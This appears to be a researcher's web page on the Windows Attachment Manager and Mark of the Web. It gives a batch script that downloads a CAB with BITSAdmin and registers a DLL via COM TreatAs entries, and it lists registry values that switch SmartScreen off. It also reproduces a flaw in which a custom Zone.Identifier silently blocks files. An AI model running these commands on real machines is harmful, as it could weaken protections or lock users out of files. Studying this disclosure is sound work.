Vulnerability and Exploit Detector
and save it in an arbitrary directory.
Create a text file SENTINEL.REG
with the following
contents:
REGEDIT4
; Copyright © 2004-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
; NOTE: replace ‹path› with the directory used in step 2.
@="‹path›\\SENTINEL.DLL"
"ThreadingModel"="Both"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{2781761E-28E0-4109-99FE-B9D127C57AFE}"
; NOTE: the following entries are optional and can be omitted!
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
Double-click the file SENTINEL.REG
created in the
previous step 3. to merge it into the user’s
Registry.
Run the following command line to verify the proper registration of the COM class:
RUNDLL32.EXE /STA {2781761E-28E0-4109-99FE-B9D127C57AFE}
Download an arbitrary (portable executable
image) file with
your WWW browser, for
example
SENTINEL.EXE
,
or save an attachment in your mail client, and notice the message
boxes displayed from the
SENTINEL.DLL
downloaded in step 2.
Rem Copyright © 2004-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER IOAV /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
Start https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
If "%PROCESSOR_ARCHITECTURE%" == "AMD64" Goto :AMD64
If "%PROCESSOR_ARCHITEW6432%" == "AMD64" Goto :WOW6432
If "%PROCESSOR_ARCHITECTURE%" == "x86" Goto :I386
Exit /B
:AMD64
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Goto :COMMON
:WOW6432
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%ProgramW6432%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
:I386
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
:COMMON
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
Start "IOAV" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Exit /B
Mark of the Web, an NTFS Alternate Data Stream named
Zone.Identifier
containing the text
[ZoneTransfer]\r\nZoneId=‹integer›\r\n
to
the saved file; in the second case it evaluates the
Mark of the Web. Information about the Unsafe File List in Internet Explorer
REGEDIT4
[HKEY_CLASSES_ROOT\.‹extension›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe
[HKEY_CLASSES_ROOT\‹ProgId›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Associations]
; =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
; =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Policies\Associations]
; =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
; =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003
Windows 8 introduced Windows Defender SmartScreen ...
REGEDIT4
[HKEY_CLASSES_ROOT\‹ProgId›\Shell\‹Verb›]
"NoSmartScreen"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Warn"
; ="Off"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System]
"EnableSmartScreen"=dword:00000001
"ShellSmartScreenLevel"="Warn"
; ="None"
; ="Block"
Log on to an arbitrary (unprivileged) user account and start the
Command Processor
%SystemRoot%\System32\Cmd.exe
alias
%ComSpec%
in an arbitrary, preferable empty directory.
Note: if you don’t want to switch between the Command Processor and File Explorer windows, choose the desktop and skip step 3.
Execute the following (block of) command lines to create 8 text
files Offender.cmd
, Offender.com
,
Offender.exe
, Offender.reg
,
Offender.rtf
, Offender.txt
,
Offender.url
and Offender.vbs
, plus a
cabinet archive
Offender.cab
in the directory chosen in step 1.:
COPY NUL: Offender.exe 1>Offender.cmd ECHO PAUSE 1>Offender.com ECHO X5O!P%@AP[4\PZX54(P^^^^)7CC)7}$Write_any_string_on_standard_output$H+H* 1>Offender.reg ECHO REGEDIT4 1>Offender.rtf ECHO {\rtf1\ansi} 1>Offender.txt ECHO 1>Offender.url ECHO [InternetShortcut] 1>>Offender.url ECHO URL=about:blank 1>Offender.vbs ECHO WScript.Echo WScript.ScriptFullName MAKECAB.EXE Offender.txt Offender.cab
1 file(s) copied. Cabinet Maker - Lossless Data Compression Tool 100.00% [flushing current folder]Note: the file extensions
.cmd
,
.com
, .exe
, .reg
,
.rtf
, .url
and .vbs
are all
classified dangerous– see the documentation for the Win32 functions
AssocIsDangerous()
and
SaferiIsExecutableFileType()
for details.
FILETYPEATTRIBUTEFLAGS enumeration
Note: Offender.com
is a modified
EICAR
standard anti-virus test file;
its file size is 70 bytes.
Start the File Explorer to open the directory chosen in step 1.:
START .
Double-click the 8 text files created in step 2. to open or execute them (in alphabetical order) and notice the default behaviour:
Offender.cmd
opens another window of the
Command Processor, writes the text
Press any key to continue . . .and waits for any key to be pressed.
Offender.com
fails with error code 216
alias
ERROR_EXE_MACHINE_TYPE_MISMATCH
,
derived from
NTSTATUS
0x40000023
alias STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
–
Windows’ module loader displays a message box to
report the error.
Offender.com
writes the
text Write_any_string_on_standard_outputand closes the window of the NT Virtual DOS Machine immediately.
Offender.exe
fails (expected and intended)
with error code 193 alias
ERROR_BAD_EXE_FORMAT
,
derived from
NTSTATUS
0xC000011E
alias STATUS_MAPPED_FILE_SIZE_ZERO
or
0xC000012F
alias STATUS_INVALID_IMAGE_NOT_MZ
respectively;
Windows’ module loader displays a message box to
report the error.
Offender.reg
starts the
Registry Editor which asks for
confirmation (twice if started in the
protectedadministrator account created during Windows Setup).
Offender.rtf
starts
WordPad which shows a blank page.
Executionof
Offender.txt
starts
Editor which shows the text
ECHO is on
.
Offender.url
starts the default
WWW browser which shows a
blank page.
Offender.vbs
starts the
Windows Script Host which displays
a message box titled Windows Script Hostwith the fully qualified pathname of
Offender.vbs
and waits for the
button to be clicked.
Close WordPad, Editor and all message boxes.
Double-click the
cabinet archive
Offender.cab
created in step 1. to open it, then
select its contents and click Extract…
– the
archive file opens in File Explorer and extraction
succeeds.
Right click the file Offender.txt
to display its
context menu, then open the Send to
drop-down menu and click
Compressed (zipped) folder
to create a ZIP
archive Offender.zip
.
Right click the ZIP archive created in step 5. to
display its context menu, then click Extract all…
and
follow the wizard: extraction succeeds too.
Activate the Command Processor window
and execute the following (block of) command lines to add a
Mark of the Web
specifying the Internet zone to
the 10 files Offender.*
created before:
FOR %? IN (Offender.*) DO @( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>%?:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.cab:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.cmd:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.com:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.exe:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.reg:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.rtf:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.txt:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.url:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.vbs:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.zip:Zone.Identifier
Activate the File Explorer window,
right click on one of the 10 files Offender.*
to
display its context menu, then click Properties
– the
security notice This file came from another computer and might be
blocked to help protect this computer.
is displayed at the
bottom of the Properties
dialog box.
Close the Properties
dialog box, then double-click the
application
Offender.exe
to execute it: a dialog
box titled Windows protected your PC
with the message text
Windows Defender SmartScreen prevented an unrecognized app from
starting, Running this app might put your PC at risk. […]
is displayed.
After clicking the button
the module loader displays the same error message box as in
step 4.
Double-click the other 9 files Offender.*
too: except
for Offender.cab
, Offender.rtf
,
Offender.txt
and Offender.zip
the same
dialog box titled Windows protected your PC
is displayed;
clicking the button yields
the same result as in step 4.
Repeat steps 6. and 7., then right click the extracted files to
display their context menu and click Properties
– the
security notice This file came from another computer and might be
blocked to help protect this computer.
is displayed at the
bottom of the Properties
dialog box, demonstrating that file
extraction propagates the Mark of the Web
for the
Internet zone.
Activate the Command Processor window
again and execute the following (block of) command lines to write
a Mark of the Web
specifying a custom zone
to the 10 files Offender.*
created before:
FOR %? IN (Offender.*) DO @( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>%?:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.cab:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.cmd:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.com:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.exe:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.reg:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.rtf:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.url:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.vbs:Zone.Identifier ( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.zip:Zone.Identifier
Activate the File Explorer window,
right click on one of the 10 files Offender.*
to
display its context menu, then click Properties
– the
security notice This file came from another computer and might be
blocked to help protect this computer.
is displayed at the
bottom of the Properties
dialog box.
Close the Properties
dialog box, then double-click the
application
Offender.exe
to execute it again:
no reaction, no warning, no error message box!
Double-click the other 9 files Offender.*
again:
Offender.cmd
, Offender.com
and
Offender.reg
exhibit no reaction too,
while Offender.cab
, Offender.rtf
,
Offender.txt
, Offender.url
,
Offender.vbs
and Offender.zip
are opened
as before.
Repeat step 6., then right click the extracted file to display
its context menu and click Properties
– the security
notice This file came from another computer and might be blocked
to help protect this computer.
is not displayed
at the bottom of the Properties
dialog box, i.e. the
Mark of the Web
for the custom zone was not
propagated from the
cabinet archive
Offender.cab
!
Repeat step 7.: an error message box Access is denied.
is displayed.
Activate the Command Processor window and execute the following command line to open or execute all 10 files for the last time:
FOR %? IN (Offender.*) DO START /WAIT %?
START /WAIT Offender.cab START /WAIT Offender.cmd Access denied START /WAIT Offender.com Access denied START /WAIT Offender.exe Access denied START /WAIT Offender.reg Access denied START /WAIT Offender.rtf START /WAIT Offender.txt START /WAIT Offender.url START /WAIT Offender.vbs START /WAIT Offender.zip
We have investigated this issue and determined that it is more of a functionality bug that there is no GUI message displayed, rather than a security vulnerability.OUCH:Unfortunately, as this does not meet our bar for servicing in an immediate security update, I have closed this case.
denial of servicedue to CWE-20: Improper Input Validation, CWE-1284: Improper Validation of Specified Quantity in Input, CWE-1286: Improper Validation of Syntactic Correctness of Input and CWE-1287: Improper Validation of Specified Type of Input as well as CAPEC-210: Abuse Existing Functionality is commonly handled as vulnerability!
Use the X.509 certificate to send S/MIME encrypted mail.
Note: email in weird format and without a proper sender name is likely to be discarded!
I dislike
HTML (and even
weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your
nickname.
I abhor top posts and expect inline quotes in replies.
as iswithout any warranty, neither express nor implied.
cookiesin the web browser.
The web service is operated and provided by
Telekom Deutschland GmbH The web service provider stores a session cookie
in the web
browser and records every visit of this web site with the following
data in an access log on their server(s):